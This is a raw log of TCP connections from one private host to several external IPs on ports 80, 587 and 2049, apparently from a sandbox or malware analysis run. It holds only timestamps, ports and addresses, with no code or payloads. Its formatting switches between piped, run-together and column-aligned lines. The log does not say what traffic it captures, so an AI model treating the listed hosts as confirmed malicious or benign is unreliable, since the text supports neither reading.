Nov 5, 2024 17:04:43.251600027 CET | 61995 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:04:43.256333113 CET | 80 | 61995 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:04:43.256344080 CET | 80 | 61995 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:04:43.437382936 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.438473940 CET | 59825 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:04:43.443325043 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.676660061 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.676893950 CET | 59825 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:04:43.681756020 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.703448057 CET | 61996 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:43.708415985 CET | 2049 | 61996 | 212.162.149.53 | 192.168.2.5
Nov 5, 2024 17:04:43.708715916 CET | 61996 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:43.709053040 CET | 61996 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:43.713901043 CET | 2049 | 61996 | 212.162.149.53 | 192.168.2.5
Nov 5, 2024 17:04:43.911214113 CET | 80 | 61995 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:04:43.911510944 CET | 61995 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:04:43.915127993 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.915409088 CET | 59825 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:04:43.916865110 CET | 80 | 61995 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:04:43.916919947 CET | 61995 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:04:43.920267105 CET | 80 | 61994 | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:04:43.920279026 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.921360016 CET | 61994 | 80 | 192.168.2.5 | 54.244.188.177
Nov 5, 2024 17:04:43.926661015 CET | 80 | 61994 | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:04:43.929040909 CET | 61994 | 80 | 192.168.2.5 | 54.244.188.177
Nov 5, 2024 17:04:43.937514067 CET | 61997 | 80 | 192.168.2.5 | 72.52.178.23
Nov 5, 2024 17:04:43.942435026 CET | 80 | 61997 | 72.52.178.23 | 192.168.2.5
Nov 5, 2024 17:04:43.942790031 CET | 61997 | 80 | 192.168.2.5 | 72.52.178.23
Nov 5, 2024 17:04:43.943321943 CET | 61997 | 80 | 192.168.2.5 | 72.52.178.23
Nov 5, 2024 17:04:43.943455935 CET | 61997 | 80 | 192.168.2.5 | 72.52.178.23
Nov 5, 2024 17:04:43.948096037 CET | 80 | 61997 | 72.52.178.23 | 192.168.2.5
Nov 5, 2024 17:04:43.948288918 CET | 80 | 61997 | 72.52.178.23 | 192.168.2.5
Nov 5, 2024 17:04:44.156209946 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:44.159224987 CET | 59825 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:04:44.164222002 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:44.194139004 CET | 2049 | 61996 | 212.162.149.53 | 192.168.2.5
Nov 5, 2024 17:04:44.194279909 CET | 61996 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:44.195602894 CET | 61996 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:44.395998001 CET | 61998 | 80 | 192.168.2.5 | 18.246.231.120
Nov 5, 2024 17:04:44.398794889 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:44.399126053 CET | 59825 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:04:44.401091099 CET | 80 | 61998 | 18.246.231.120 | 192.168.2.5
Nov 5, 2024 17:04:44.401160955 CET | 61998 | 80 | 192.168.2.5 | 18.246.231.120
Nov 5, 2024 17:04:44.401333094 CET | 61998 | 80 | 192.168.2.5 | 18.246.231.120
Nov 5, 2024 17:04:44.401432991 CET | 61998 | 80 | 192.168.2.5 | 18.246.231.120
Nov 5, 2024 17:04:44.405988932 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:44.406193972 CET | 80 | 61998 | 18.246.231.120 | 192.168.2.5
Nov 5, 2024 17:04:44.406910896 CET | 80 | 61998 | 18.246.231.120 | 192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.644395113 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.644805908 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.649751902 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.705827951 CET806199772.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.705945015 CET6199780192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.706042051 CET6199780192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.709058046 CET6199980192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.711955070 CET806199772.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.714600086 CET806199972.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.714679956 CET6199980192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.714895010 CET6199980192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.714976072 CET6199980192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.720057011 CET806199972.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.720083952 CET806199972.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.882608891 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.883393049 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.883393049 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.883441925 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.883479118 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.884758949 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.888338089 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.888350010 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.888359070 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.888403893 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.888633966 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.888679981 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.889734030 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.889743090 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.889791012 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.889821053 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.889831066 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.889889002 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.889926910 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.889935970 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.889964104 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.889985085 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.890007019 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.893085003 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.893099070 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.893184900 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.893210888 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.893244982 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.893970013 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.894010067 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.894768000 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.894872904 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.894905090 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.894932985 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.894963026 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.894970894 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.895015955 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.895025969 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.895068884 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.895092010 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.895117044 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.895173073 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.898154020 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.898979902 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:44.899104118 CET59825587192.168.2.551.195.88.199
Nov 5, 2024 17:04:44.899436951 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.899487019 CET  59825  587    192.168.2.5     51.195.88.199
Nov 5, 2024 17:04:44.899852037 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.899931908 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.899976969 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.900338888 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.900348902 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.900357962 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.900367022 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.900376081 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.900386095 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.900394917 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.900418997 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.900428057 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904244900 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904306889 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904315948 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904325962 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904335022 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904468060 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904476881 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904546022 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904555082 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904649973 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904678106 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904761076 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904769897 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904891014 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:44.904900074 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:45.235228062 CET  80     61998  18.246.231.120  192.168.2.5
Nov 5, 2024 17:04:45.235502005 CET  61998  80     192.168.2.5     18.246.231.120
Nov 5, 2024 17:04:45.285068035 CET  80     61998  18.246.231.120  192.168.2.5
Nov 5, 2024 17:04:45.291759968 CET  80     61998  18.246.231.120  192.168.2.5
Nov 5, 2024 17:04:45.291812897 CET  61998  80     192.168.2.5     18.246.231.120
Nov 5, 2024 17:04:45.393877983 CET  587    59825  51.195.88.199   192.168.2.5
Nov 5, 2024 17:04:45.428742886 CET  80     61999  72.52.178.23    192.168.2.5
Nov 5, 2024 17:04:45.428832054 CET  61999  80     192.168.2.5     72.52.178.23
Nov 5, 2024 17:04:45.429017067 CET  61999  80     192.168.2.5     72.52.178.23
Nov 5, 2024 17:04:45.433823109 CET  80     61999  72.52.178.23    192.168.2.5
Nov 5, 2024 17:04:45.445313931 CET  62000  80     192.168.2.5     44.221.84.105
Nov 5, 2024 17:04:45.446353912 CET  62001  80     192.168.2.5     18.208.156.248
Nov 5, 2024 17:04:45.450468063 CET  80     62000  44.221.84.105   192.168.2.5
Nov 5, 2024 17:04:45.451061010 CET  62000  80     192.168.2.5     44.221.84.105
Nov 5, 2024 17:04:45.451173067 CET  62000  80     192.168.2.5     44.221.84.105
Nov 5, 2024 17:04:45.451196909 CET  62000  80     192.168.2.5     44.221.84.105
Nov 5, 2024 17:04:45.451432943 CET  80     62001  18.208.156.248  192.168.2.5
Nov 5, 2024 17:04:45.455059052 CET  62001  80     192.168.2.5     18.208.156.248
Nov 5, 2024 17:04:45.455219030 CET  62001  80     192.168.2.5     18.208.156.248
Nov 5, 2024 17:04:45.455250978 CET  62001  80     192.168.2.5     18.208.156.248
Nov 5, 2024 17:04:45.455881119 CET  80     62000  44.221.84.105   192.168.2.5
Nov 5, 2024 17:04:45.456047058 CET  80     62000  44.221.84.105   192.168.2.5
Nov 5, 2024 17:04:45.460009098 CET  80     62001  18.208.156.248  192.168.2.5
Nov 5, 2024 17:04:45.460046053 CET  80     62001  18.208.156.248  192.168.2.5
Nov 5, 2024 17:04:45.543812990 CET  59825  587    192.168.2.5     51.195.88.199
Nov 5, 2024 17:04:46.112863064 CET  80     62000  44.221.84.105   192.168.2.5
Nov 5, 2024 17:04:46.113142014 CET  62000  80     192.168.2.5     44.221.84.105
Nov 5, 2024 17:04:46.119875908 CET  80     62001  18.208.156.248  192.168.2.5
Nov 5, 2024 17:04:46.120155096 CET  62001  80     192.168.2.5     18.208.156.248
Nov 5, 2024 17:04:46.120609045 CET  80     62000  44.221.84.105   192.168.2.5
Nov 5, 2024 17:04:46.120711088 CET  62000  80     192.168.2.5     44.221.84.105
Nov 5, 2024 17:04:46.126969099 CET  80     62001  18.208.156.248  192.168.2.5
Nov 5, 2024 17:04:46.127911091 CET  62001  80     192.168.2.5     18.208.156.248
Nov 5, 2024 17:04:46.133768082 CET  62002  80     192.168.2.5     18.141.10.107
Nov 5, 2024 17:04:46.138746977 CET  80     62002  18.141.10.107   192.168.2.5
Nov 5, 2024 17:04:46.141068935 CET  62002  80     192.168.2.5     18.141.10.107
Nov 5, 2024 17:04:46.141397953 CET  62002  80     192.168.2.5     18.141.10.107
Nov 5, 2024 17:04:46.141669035 CET  62002  80     192.168.2.5     18.141.10.107
Nov 5, 2024 17:04:46.146220922 CET  80     62002  18.141.10.107   192.168.2.5
Nov 5, 2024 17:04:46.146553993 CET  80     62002  18.141.10.107   192.168.2.5
Nov 5, 2024 17:04:46.524657011 CET  62003  80     192.168.2.5     44.221.84.105
Nov 5, 2024 17:04:46.529670954 CET  80     62003  44.221.84.105   192.168.2.5
Nov 5, 2024 17:04:46.529742956 CET  62003  80     192.168.2.5     44.221.84.105
Nov 5, 2024 17:04:46.531105042 CET  62003  80     192.168.2.5     44.221.84.105
Nov 5, 2024 17:04:46.531143904 CET  62003  80     192.168.2.5     44.221.84.105
Nov 5, 2024 17:04:46.535991907 CET  80     62003  44.221.84.105   192.168.2.5
Nov 5, 2024 17:04:46.536004066 CET  80     62003  44.221.84.105   192.168.2.5
Nov 5, 2024 17:04:47.191960096 CET  80     62003  44.221.84.105   192.168.2.5
Nov 5, 2024 17:04:47.192378998 CET  62003  80     192.168.2.5     44.221.84.105
Nov 5, 2024 17:04:47.197710991 CET  80     62003  44.221.84.105   192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.197760105 CET6200380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.532211065 CET6200480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.537112951 CET806200472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.537189960 CET6200480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.537579060 CET6200480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.537637949 CET6200480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.542375088 CET806200472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.542452097 CET806200472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.568737984 CET806200218.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.568905115 CET6200280192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.574366093 CET806200218.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.574450970 CET6200280192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.584582090 CET6200580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.589546919 CET806200518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.589612007 CET6200580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.589853048 CET6200580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.589883089 CET6200580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.594744921 CET806200518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.594754934 CET806200518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.264832020 CET806200518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.283337116 CET806200518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.285217047 CET6200580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.290380955 CET806200472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.291188002 CET6200480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.300637007 CET6200580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.305679083 CET806200518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.314254045 CET6200480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.319145918 CET806200472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.324282885 CET6200680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.329319000 CET8062006172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.329742908 CET6200680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.411969900 CET6200680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.412023067 CET6200680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.417032957 CET8062006172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.417049885 CET8062006172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.629965067 CET6200780192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.634991884 CET806200772.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.635098934 CET6200780192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.638221025 CET6200780192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.638478994 CET6200780192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.643124104 CET806200772.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.643546104 CET806200772.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.004654884 CET8062006172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.007067919 CET6200680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.063682079 CET6200680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.068777084 CET8062006172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.085741997 CET6200880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.091005087 CET8062008172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.095062017 CET6200880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.098841906 CET6200880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.098876953 CET6200880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.103754997 CET8062008172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.105715990 CET8062008172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.202289104 CET620092049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.207277060 CET204962009212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.210697889 CET620092049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.211350918 CET620092049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.216234922 CET204962009212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.398720026 CET806200772.52.178.23192.168.2.5
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Nov 5, 2024 17:04:49.398817062 CET  62007        80         192.168.2.5      72.52.178.23
Nov 5, 2024 17:04:49.398972034 CET  62007        80         192.168.2.5      72.52.178.23
Nov 5, 2024 17:04:49.403789043 CET  80           62007      72.52.178.23     192.168.2.5
Nov 5, 2024 17:04:49.698870897 CET  2049         62009      212.162.149.53   192.168.2.5
Nov 5, 2024 17:04:49.699069023 CET  62009        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:04:49.699673891 CET  62009        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:04:49.743172884 CET  62010        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:49.748198986 CET  80           62010      44.221.84.105    192.168.2.5
Nov 5, 2024 17:04:49.748269081 CET  62010        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:49.748550892 CET  62010        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:49.748570919 CET  62010        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:49.754519939 CET  80           62010      44.221.84.105    192.168.2.5
Nov 5, 2024 17:04:49.755080938 CET  80           62010      44.221.84.105    192.168.2.5
Nov 5, 2024 17:04:49.767642021 CET  80           62008      172.234.222.138  192.168.2.5
Nov 5, 2024 17:04:49.767832041 CET  62008        80         192.168.2.5      172.234.222.138
Nov 5, 2024 17:04:49.767863035 CET  62008        80         192.168.2.5      172.234.222.138
Nov 5, 2024 17:04:49.773730040 CET  80           62008      172.234.222.138  192.168.2.5
Nov 5, 2024 17:04:49.784415007 CET  62011        80         192.168.2.5      54.244.188.177
Nov 5, 2024 17:04:49.789232016 CET  80           62011      54.244.188.177   192.168.2.5
Nov 5, 2024 17:04:49.789300919 CET  62011        80         192.168.2.5      54.244.188.177
Nov 5, 2024 17:04:49.789572954 CET  62011        80         192.168.2.5      54.244.188.177
Nov 5, 2024 17:04:49.789639950 CET  62011        80         192.168.2.5      54.244.188.177
Nov 5, 2024 17:04:49.794346094 CET  80           62011      54.244.188.177   192.168.2.5
Nov 5, 2024 17:04:49.794507980 CET  80           62011      54.244.188.177   192.168.2.5
Nov 5, 2024 17:04:50.418481112 CET  80           62010      44.221.84.105    192.168.2.5
Nov 5, 2024 17:04:50.428631067 CET  62010        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:50.433824062 CET  80           62010      44.221.84.105    192.168.2.5
Nov 5, 2024 17:04:50.437321901 CET  62010        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:50.620486975 CET  80           62011      54.244.188.177   192.168.2.5
Nov 5, 2024 17:04:50.622092962 CET  62011        80         192.168.2.5      54.244.188.177
Nov 5, 2024 17:04:50.629678965 CET  80           62011      54.244.188.177   192.168.2.5
Nov 5, 2024 17:04:50.630220890 CET  62011        80         192.168.2.5      54.244.188.177
